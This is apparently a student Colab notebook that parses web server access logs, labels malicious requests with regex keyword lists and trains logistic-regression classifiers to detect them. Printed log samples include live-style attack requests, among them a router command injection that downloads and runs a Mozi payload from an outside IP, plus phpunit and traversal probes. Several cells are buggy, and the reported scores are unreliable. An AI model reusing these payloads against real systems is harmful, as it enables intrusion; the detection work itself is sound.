# 1 Imports

In [1]:
from os import listdir
from os.path import isfile, join
import numpy as np
import pandas as pd

In [2]:
# fastai imports
%load_ext autoreload
%autoreload 2
%matplotlib inline

In [None]:
# fastai imports (not needed here?)
# from fastai.imports import *
# from fastai.tabular import *

In [78]:
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer, TfidfTransformer
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
from sklearn import metrics

In [4]:
# google drive
from google.colab import drive
drive.mount('/content/drive')

Mounted at /content/drive


## 1.1 Read all files in `data` directory

In [None]:
!pwd

/content


In [6]:
!ls 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/data/'

2021-01-001.log  2021-01-011.log  access.log.1	 access.log.19	access.log.28
2021-01-002.log  2021-01-012.log  access.log.10  access.log.2	access.log.29
2021-01-003.log  2021-01-013.log  access.log.11  access.log.20	access.log.3
2021-01-004.log  2021-01-014.log  access.log.12  access.log.21	access.log.4
2021-01-005.log  2021-01-015.log  access.log.13  access.log.22	access.log.5
2021-01-006.log  2021-01-016.log  access.log.14  access.log.23	access.log.6
2021-01-007.log  2021-01-017.log  access.log.15  access.log.24	access.log.7
2021-01-008.log  2021-01-018.log  access.log.16  access.log.25	access.log.8
2021-01-009.log  2021-01-019.log  access.log.17  access.log.26	access.log.9
2021-01-010.log  access.log	  access.log.18  access.log.27


In [7]:
!tail -10 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/data/access.log'

103.149.192.199 - - [17/Oct/2020:06:35:02 +0200] "GET / HTTP/1.1" 200 396 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
213.32.122.82 - - [17/Oct/2020:06:46:43 +0200] "GET / HTTP/1.1" 200 13 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
119.159.225.189 - - [17/Oct/2020:07:14:06 +0200] "GET /admin//config.php HTTP/1.1" 404 232 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
91.241.19.173 - - [17/Oct/2020:07:23:15 +0200] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 182 "-" "-"
5.188.210.227 - - [17/Oct/2020:08:22:54 +0200] "\x05\x01\x00" 400 182 "-" "-"
5.188.210.227 - - [17/Oct/2020:08:24:12 +0200] "\x04\x01\x00P\x05\xBC\xD2\xE3\x00" 400 182 "-" "-"
5.188.210.227 - - [17/Oct/2020:08:25:25 +0200] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 209 "https://www.google.com/" "Moz

In [8]:
# read all data files
mypath = 'drive/My Drive/Colab Notebooks/AIacademy/class-C/project/data'
data_files = [f for f in listdir(mypath) if isfile(join(mypath, f))]
data_files

['access.log.15',
 'access.log.16',
 'access.log.17',
 'access.log.18',
 'access.log.19',
 'access.log.20',
 'access.log.21',
 'access.log.22',
 'access.log.23',
 'access.log.24',
 'access.log.25',
 'access.log.26',
 'access.log.28',
 'access.log.27',
 'access.log.29',
 'access.log.14',
 'access.log.13',
 'access.log.12',
 'access.log.11',
 'access.log.10',
 'access.log.9',
 'access.log.8',
 'access.log.1',
 'access.log',
 'access.log.2',
 'access.log.3',
 'access.log.4',
 'access.log.5',
 'access.log.6',
 'access.log.7',
 '2021-01-015.log',
 '2021-01-014.log',
 '2021-01-013.log',
 '2021-01-012.log',
 '2021-01-011.log',
 '2021-01-010.log',
 '2021-01-009.log',
 '2021-01-008.log',
 '2021-01-007.log',
 '2021-01-006.log',
 '2021-01-005.log',
 '2021-01-004.log',
 '2021-01-003.log',
 '2021-01-002.log',
 '2021-01-001.log',
 '2021-01-019.log',
 '2021-01-018.log',
 '2021-01-017.log',
 '2021-01-016.log']

## 1.2 Add all files data into one Pandas dataframe

In [9]:
%%time
li = []
for file in data_files:
    tmp = pd.read_csv(f'{mypath}/{file}', sep='\s+', header=None)
    li.append(tmp)
df = pd.concat(li, axis=0, ignore_index=True)

CPU times: user 212 ms, sys: 22.1 ms, total: 234 ms
Wall time: 14.9 s


# 2 Explore and prepare data

In [10]:
df.head()

Unnamed: 0,0,1,2,3,4,5,6,7,8,9
0,66.240.205.34,-,-,[26/Sep/2020:07:26:07,+0200],Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``...,400,182,-,-
1,176.113.115.214,-,-,[26/Sep/2020:07:27:21,+0200],GET /vendor/phpunit/phpunit/src/Util/PHP/eval-...,404,209,-,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
2,199.195.254.38,-,-,[26/Sep/2020:08:04:18,+0200],GET ../../proc/ HTTP,400,182,-,-
3,176.113.115.214,-,-,[26/Sep/2020:08:07:45,+0200],POST /vendor/phpunit/phpunit/src/Util/PHP/eval...,404,209,-,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
4,156.146.36.72,-,-,[26/Sep/2020:08:19:34,+0200],GET /robots.txt HTTP/1.1,404,232,-,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...


In [11]:
df.shape

(9431, 10)

## 2.1 Remove columns holding useless data '-' and rows with request = nan

In [12]:
df[1].describe()

count     9431
unique       1
top          -
freq      9431
Name: 1, dtype: object

In [13]:
rm_colls =[1,2,4,8]
df.drop(df.columns[rm_colls], axis=1, inplace=True)

Give names to columns

In [14]:
columns = {0:'IP',3:'date',5:'request',6:'code',7:'body_bytes',9:'agent'}
df.rename(columns=columns,inplace=True)

remove rows with `request` = nan

In [15]:
df = df[df['request'].notna()]

remove '[' from date_time column

In [16]:
df['date'] = df['date'].str[1:]

In [17]:
df.head()

Unnamed: 0,IP,date,request,code,body_bytes,agent
0,66.240.205.34,26/Sep/2020:07:26:07,Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``...,400,182,-
1,176.113.115.214,26/Sep/2020:07:27:21,GET /vendor/phpunit/phpunit/src/Util/PHP/eval-...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
2,199.195.254.38,26/Sep/2020:08:04:18,GET ../../proc/ HTTP,400,182,-
3,176.113.115.214,26/Sep/2020:08:07:45,POST /vendor/phpunit/phpunit/src/Util/PHP/eval...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
4,156.146.36.72,26/Sep/2020:08:19:34,GET /robots.txt HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...


In [18]:
dft = df[~df['request'].str.contains(fr"\\x", regex=True)] #; dft.head()
# dft[200:211]
dft.shape

(8899, 6)

In [22]:
# check if there is even line number for 50% split
if dft.shape[0] % 2 == 1:
  dft = dft[:-1]
dft.shape

(8898, 6)

In [None]:
df[df.request.str.contains('w00t', regex=True, na=False)].values

In [23]:
# pd.set_option('display.max_columns', 200)
# pd.set_option('large_repr','info')
dft.request[400:500].values

array(['lv[endof]', 'GET /config/getuser?index=0 HTTP/1.1',
       'GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1',
       'GET / HTTP/1.0', 'GET / HTTP/1.1',
       'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.97.102.104:59966/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0',
       'POST /GponForm/diag_Form?images/ HTTP/1.1', '/tmp/gpon80&ipv=0',
       'GET /solr/admin/info/system?wt=json HTTP/1.1', 'HEAD / HTTP/1.0',
       'GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1',
       'GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1',
       'GET /ReportServer HTTP/1.1', 'GET / HTTP/1.1', 'GET / HTTP/1.1',
       'GET / HTTP/1.1', 'GET / HTTP/1.1',
       'POST /api/jsonws/invoke HTTP/1.1', 'GET / HTTP/1.0',
       'GET / HTTP/1.1', 'GET / HTTP/1.1', 'GET / HTTP/1.1',
       'GET / HTTP/1.1',
       'GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0',
       'GET ../../proc/ HTT

Potential malitious requests:
die, md5, phpunit, .env,

# 3 Data labeling

The source of access logs server is where the Python Flask application runs.

## 3.1 Functions used to filter malicious requests using keywords 

In [24]:
def find_bad(tmp_df, phrase):
    'Find rows by keyword phrase using regex'
    new_df = tmp_df[tmp_df.requests.str.contains(phrase, regex=True, na=False)]
    return new_df

In [25]:
def build_phrase(list):
    tmp = ''
    for word in list:
        if tmp == '': tmp = f'{word}'
        else: tmp = f'{tmp}|{word}'
    return tmp

### 3.1.1 all bad requests

In [26]:
def get_bad_requests(tmp1_df, keywords):
  bad_requests_phrase = build_phrase(keywords)
  bad_requests_rows = tmp1_df[tmp1_df.request.str.contains(bad_requests_phrase, regex=True, na=False)]
  return bad_requests_rows

In [29]:
# 
bad_list_1 = [
  'shell', 'die', 'md5', 'env', 'wget', 'phpunit', 'cmod', 'chown',
  'adminisp', 'call_user_func_array', 'w00tw00t', 'ZINFO', 'script', 'example.com',
  'getuser\?index\=', 'link\?url\='
]

In [30]:
bad_list_2 = [
    'cgi', 'shell', 'die', '@md5', 'phpunit', '\.env', '\.sh', '\.\./',
    'ls+', 'cd\+', 'rm\+', '\-rf', 'wget', 'cmod', 'chown',
    'ZINFO', 'fig', 'script', '<php', 'w00t', '\=https'
]

In [31]:
bad_requests1 = get_bad_requests(dft, bad_list_1)
bad_requests1.shape

(830, 6)

In [32]:
bad_requests2 = get_bad_requests(dft, bad_list_2)
bad_requests2.shape

(1077, 6)

## 3.2 Tests on filtering bad requests

### 3.2.1 Find malitious requests accessing *.php files

In [None]:
# php_requests = df.loc[df.request.str.contains('^.php')]
# df.request.str.contains('^.php^')
bad_php = df[df.request.str.contains('php', regex=True, na=False)]

In [None]:
bad_php.shape

(3114, 6)

### 3.2.2 Find malitiuos requests trying to execute shell commands

In [None]:
bad_shell = df[df.request.str.contains('shell|cd\+|rm\+|\-rf|wget\+|chmod\+|chown\+|ls\+', regex=True, na=False)]

In [None]:
bad_shell.shape

(34, 6)

### 3.2.3 Find malitious requests of CGI

In [None]:
bad_cgi = df[df.request.str.contains('cgi', regex=True, na=False)]

In [None]:
bad_cgi.shape

(34, 6)

### 3.2.4 Other malitious

In [None]:
bad_other = df[df.request.str.contains('\?index=|example\.com|ZINFO|fig', regex=True, na=False)]

In [None]:
bad_other.shape

(69, 6)

## 3.3 Good requests

In [34]:
good_requests1 = bad_requests1.merge(df, how='outer', indicator=True).loc[lambda x : x['_merge']=='right_only']
# good_requests2 = bad_requests2.merge(dft, how='outer', indicator=True).loc[lambda x : x['_merge']=='right_only']

In [35]:
good_requests1.shape

(8509, 7)

In [36]:
good_requests2.shape

(7821, 7)

# 4 Model

## 4.1 Splitting the date (training / validation)

In [37]:
yBad = [1 for i in range(0, len(bad_requests2))]  #labels, 1 for malicious and 0 for clean
yGood = [0 for i in range(0, len(good_requests2))]

In [40]:
dft['is_safe'] = dft.request.isin(good_requests2.request).astype(bool) # should it be bool?

In [42]:
dft.head(10)
# dft['is_safe'].dtypes

Unnamed: 0,IP,date,request,code,body_bytes,agent,is_safe
1,176.113.115.214,26/Sep/2020:07:27:21,GET /vendor/phpunit/phpunit/src/Util/PHP/eval-...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,False
2,199.195.254.38,26/Sep/2020:08:04:18,GET ../../proc/ HTTP,400,182,-,False
3,176.113.115.214,26/Sep/2020:08:07:45,POST /vendor/phpunit/phpunit/src/Util/PHP/eval...,404,209,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,False
4,156.146.36.72,26/Sep/2020:08:19:34,GET /robots.txt HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True
5,156.146.36.72,26/Sep/2020:08:19:34,GET /xmlrpc.php?rsd HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True
6,156.146.36.72,26/Sep/2020:08:19:34,GET / HTTP/1.1,200,13,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True
7,156.146.36.72,26/Sep/2020:08:19:35,GET /blog/robots.txt HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True
8,156.146.36.72,26/Sep/2020:08:19:35,GET /blog/ HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True
9,156.146.36.72,26/Sep/2020:08:19:35,GET /wordpress/ HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True
10,156.146.36.72,26/Sep/2020:08:19:35,GET /wp/ HTTP/1.1,404,232,Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:5...,True


In [43]:
queries = dft['request'].to_list()

In [44]:
y = dft['is_safe'].to_list()

In [45]:
len(y)

8898

In [49]:
# 50% split
mid = int(len(y) / 2)
mid
trn_y = y[:mid]
val_y = y[mid:]

In [51]:
len(trn_y)

4449

In [52]:
trn = queries[:mid]
val = queries[mid:]
len(queries), len(trn), len(val)

(8898, 4449, 4449)

## 4.2 TfidfVectorizer

In [61]:
vectorizer = TfidfVectorizer(
    min_df=0.0, 
    analyzer="char", 
    sublinear_tf=True, 
    ngram_range=(2,6))
X = vectorizer.fit_transform(queries)

In [62]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, random_state=42)

In [63]:
lgs = LogisticRegression(class_weight={1: 2 * len(good_requests2) / len(bad_requests2), 0: 1.0})

In [64]:
%%time
lgs.fit(X_train, y_train)

CPU times: user 924 ms, sys: 1.4 s, total: 2.33 s
Wall time: 1.23 s


LogisticRegression(C=1.0, class_weight={0: 1.0, 1: 14.52367688022284},
                   dual=False, fit_intercept=True, intercept_scaling=1,
                   l1_ratio=None, max_iter=100, multi_class='auto', n_jobs=None,
                   penalty='l2', random_state=None, solver='lbfgs', tol=0.0001,
                   verbose=0, warm_start=False)

## 4.3 CountVectorizer

In [57]:
veczr = CountVectorizer(analyzer='char') #tokenizer=tokenize)

In [58]:
%%time
trn_term_doc = veczr.fit_transform(trn)
val_term_doc = veczr.transform(val)

CPU times: user 103 ms, sys: 426 µs, total: 103 ms
Wall time: 104 ms


In [59]:
trn_term_doc

<4449x63 sparse matrix of type '<class 'numpy.int64'>'
	with 67763 stored elements in Compressed Sparse Row format>

In [88]:
vocab = veczr.get_feature_names(); vocab[10:25]

['-', '.', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';']

In [66]:
w0 = set([o.lower() for o in trn[0].split(' ')]); w0

{'/vendor/phpunit/phpunit/src/util/php/eval-stdin.php', 'get', 'http/1.1'}

In [67]:
m = LogisticRegression(C=1e8)
m.fit(trn_term_doc, y_train)

STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.

Increase the number of iterations (max_iter) or scale the data as shown in:
    https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
    https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression


LogisticRegression(C=100000000.0, class_weight=None, dual=False,
                   fit_intercept=True, intercept_scaling=1, l1_ratio=None,
                   max_iter=100, multi_class='auto', n_jobs=None, penalty='l2',
                   random_state=None, solver='lbfgs', tol=0.0001, verbose=0,
                   warm_start=False)

# 5 Evaluation

## 5.1 tfidf vectorizer

In [68]:
def print_score(m, df, pred, x_test, y_test):
  fpr, tpr, _ = metrics.roc_curve(y_test, (m.predict_proba(x_test)[:, 1]))
  auc = metrics.auc(fpr, tpr)
  print(f"All rows: {len(df.IP)}, bad request count: {len(bad_requests2)}")
  print("Baseline Constant negative: %.6f" % (len(df.IP) / (len(df.IP) + len(bad_requests2))))
  print("Accuracy: %f" % lgs.score(x_test, y_test))  #checking the accuracy
  print("Precision: %f" % metrics.precision_score(y_test, predicted))
  print("Recall: %f" % metrics.recall_score(y_test, predicted))
  print("F1-Score: %f" % metrics.f1_score(y_test, predicted))
  print("AUC: %f" % auc)

In [69]:
predicted = lgs.predict(X_test)

In [70]:
fpr, tpr, _ = metrics.roc_curve(y_test, (lgs.predict_proba(X_test)[:, 1]))
auc = metrics.auc(fpr, tpr)

In [71]:
print_score(lgs, dft, predicted, X_test, y_test)

All rows: 8898, bad request count: 1077
Baseline Constant negative: 0.892030
Accuracy: 0.980445
Precision: 0.978266
Recall: 1.000000
F1-Score: 0.989014
AUC: 0.999667


## 5.2 CountVectorizer

In [72]:
preds = m.predict(val_term_doc)
(preds==val_y).mean()

0.8703079343672735

# 6 Parameter tuning

## 6.1 Tfidf vectorizer

In [None]:
# TODO pasisunkinti problema ir ja isspresti

## 6.2 Count vectorizer

# 7 Pipeline

In [None]:
model_param=1e8
vectrz_type='char'

preprocessor = Pipeline(steps=[
  ('vectorizer', CountVectorizer(analyzer=vectrz_type)),
  ('trn_trm_doc', veczr.fit_transform(trn))
])
val_trm_doc = veczr.transform(val)
my_pipe = Pipeline(steps=[
  ('preproc', preprocessor)
  ('model', LogisticRegression(C=model_param))
])
my_pipe.fit(trn_term_doc, y_train)
preds = my_pipe.predict(val_term_doc)
(preds==val_y).mean()

In [81]:
pipeline = Pipeline([
  ('vect', CountVectorizer()),
  ('tfidf', TfidfTransformer()),
  ('clf', SGDClassifier()),
])

In [89]:
parameters = {
  'vect__max_df': (0.5, 0.75, 1.0),
  'vect__max_features': (None, 5000, 10000, 50000),
  'vect__ngram_range': ((1, 3), (1, 6)),  # unigrams or bigrams
  'tfidf__use_idf': (True, False),
  'tfidf__norm': ('l1', 'l2'),
  'clf__max_iter': (20,),
  'clf__alpha': (0.00001, 0.000001),
  'clf__penalty': ('l2', 'elasticnet'),
  # 'clf__max_iter': (10, 50, 80),
}

In [90]:
grid_search = GridSearchCV(pipeline, parameters, n_jobs=-1, verbose=1)

In [92]:
grid_search.fit(list(trn_term_doc), y_train)

Fitting 5 folds for each of 384 candidates, totalling 1920 fits


[Parallel(n_jobs=-1)]: Using backend LokyBackend with 2 concurrent workers.
[Parallel(n_jobs=-1)]: Done  46 tasks      | elapsed:   33.5s
[Parallel(n_jobs=-1)]: Done 196 tasks      | elapsed:  2.4min
[Parallel(n_jobs=-1)]: Done 446 tasks      | elapsed:  5.4min
[Parallel(n_jobs=-1)]: Done 796 tasks      | elapsed:  9.6min
[Parallel(n_jobs=-1)]: Done 1246 tasks      | elapsed: 15.1min
[Parallel(n_jobs=-1)]: Done 1796 tasks      | elapsed: 21.7min
[Parallel(n_jobs=-1)]: Done 1920 out of 1920 | elapsed: 23.2min finished


AttributeError: ignored

In [93]:
grid_search.best_score_

nan